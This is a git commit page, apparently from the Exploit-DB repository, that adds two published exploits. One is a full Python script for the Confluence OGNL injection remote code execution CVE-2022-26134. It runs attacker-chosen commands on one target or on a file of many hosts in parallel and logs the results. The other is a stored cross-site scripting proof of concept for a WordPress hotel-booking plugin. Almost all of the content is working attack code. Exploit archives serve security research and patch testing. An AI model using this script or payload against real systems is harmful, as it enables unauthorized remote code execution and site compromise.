DB: 2022-06-11
2 changes to exploits/shellcodes WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
This commit is contained in:
parent
3daddca955
commit
5012842b97
3 changed files with 129 additions and 0 deletions
110
exploits/java/webapps/50952.py
Executable file
110
exploits/java/webapps/50952.py
Executable file
|
@ -0,0 +1,110 @@
|
|||
# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
|
||||
# Google Dork: N/A
|
||||
# Date: 06/006/2022
|
||||
# Exploit Author: h3v0x
|
||||
# Vendor Homepage: https://www.atlassian.com/
|
||||
# Software Link: https://www.atlassian.com/software/confluence/download-archives
|
||||
# Version: All < 7.4.17 versions before 7.18.1
|
||||
# Tested on: -
|
||||
# CVE : CVE-2022-26134
|
||||
# https://github.com/h3v0x/CVE-2022-26134
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import sys
|
||||
import requests
|
||||
import optparse
|
||||
import multiprocessing
|
||||
|
||||
from requests.packages import urllib3
|
||||
from requests.exceptions import MissingSchema, InvalidURL
|
||||
urllib3.disable_warnings()
|
||||
|
||||
requestEngine = multiprocessing.Manager()
|
||||
session = requests.Session()
|
||||
|
||||
global paramResults
|
||||
paramResults = requestEngine.list()
|
||||
globals().update(locals())
|
||||
|
||||
def spiderXpl(url):
|
||||
globals().update(locals())
|
||||
if not url.startswith('http'):
|
||||
url='http://'+url
|
||||
|
||||
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
|
||||
"Connection": "close",
|
||||
"Accept-Encoding": "gzip, deflate"}
|
||||
|
||||
try:
|
||||
response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
|
||||
if(response.status_code == 302):
|
||||
print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
|
||||
|
||||
inputBuffer = str(response.headers['X-Cmd-Response'])
|
||||
paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
|
||||
else:
|
||||
pass
|
||||
|
||||
except requests.exceptions.ConnectionError:
|
||||
print('[x] Failed to Connect: '+url)
|
||||
pass
|
||||
except multiprocessing.log_to_stderr:
|
||||
pass
|
||||
except KeyboardInterrupt:
|
||||
print('[!] Stoping exploit...')
|
||||
exit(0)
|
||||
except (MissingSchema, InvalidURL):
|
||||
pass
|
||||
|
||||
|
||||
def banner():
|
||||
print('[-] CVE-2022-26134')
|
||||
print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')
|
||||
|
||||
|
||||
def main():
|
||||
banner()
|
||||
|
||||
globals().update(locals())
|
||||
|
||||
sys.setrecursionlimit(100000)
|
||||
|
||||
if not optionsOpt.filehosts:
|
||||
url = optionsOpt.url
|
||||
spiderXpl(url)
|
||||
else:
|
||||
f = open(optionsOpt.filehosts)
|
||||
urls = map(str.strip, f.readlines())
|
||||
|
||||
multiReq = multiprocessing.Pool(optionsOpt.threads_set)
|
||||
try:
|
||||
multiReq.map(spiderXpl, urls)
|
||||
multiReq.close()
|
||||
multiReq.join()
|
||||
except UnboundLocalError:
|
||||
pass
|
||||
except KeyboardInterrupt:
|
||||
exit(0)
|
||||
|
||||
|
||||
if optionsOpt.output:
|
||||
print("\n[!] Saving the output result in: %s" % optionsOpt.output)
|
||||
|
||||
with open(optionsOpt.output, "w") as f:
|
||||
for result in paramResults:
|
||||
f.write("%s\n" % result)
|
||||
f.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = optparse.OptionParser()
|
||||
|
||||
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
|
||||
parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
|
||||
parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
|
||||
parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
|
||||
parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
|
||||
parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
|
||||
optionsOpt, args = parser.parse_args()
|
||||
|
||||
main()
|
17
exploits/php/webapps/50951.txt
Normal file
17
exploits/php/webapps/50951.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
|
||||
# Date: 2022-06-05
|
||||
# Exploit Author: Sanjay Singh
|
||||
# Vendor Homepage: https://motopress.com/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
|
||||
# Version: 4.2.4
|
||||
# Tested on: Windows/XAMPP
|
||||
###########################################################################
|
||||
PoC:
|
||||
|
||||
1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
|
||||
2. Click on "Add Accommodation Type".
|
||||
3. Add title payload= "><script>alert("XSS")</script>
|
||||
4. Excerpt input payload "><script>alert("XSS")</script>
|
||||
5. Click publish.
|
||||
6. Visit http://localhost/accommodations/
|
||||
7. XSS payload execute.
|
|
@ -45013,3 +45013,5 @@ id,file,description,date,author,type,platform,port
|
|||
50944,exploits/php/webapps/50944.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)",1970-01-01,RedHatAugust,webapps,php,
|
||||
50945,exploits/php/webapps/50945.tzt,"Contao 4.13.2 - Cross-Site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
|
||||
50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,
|
||||
50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php,
|
||||
50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue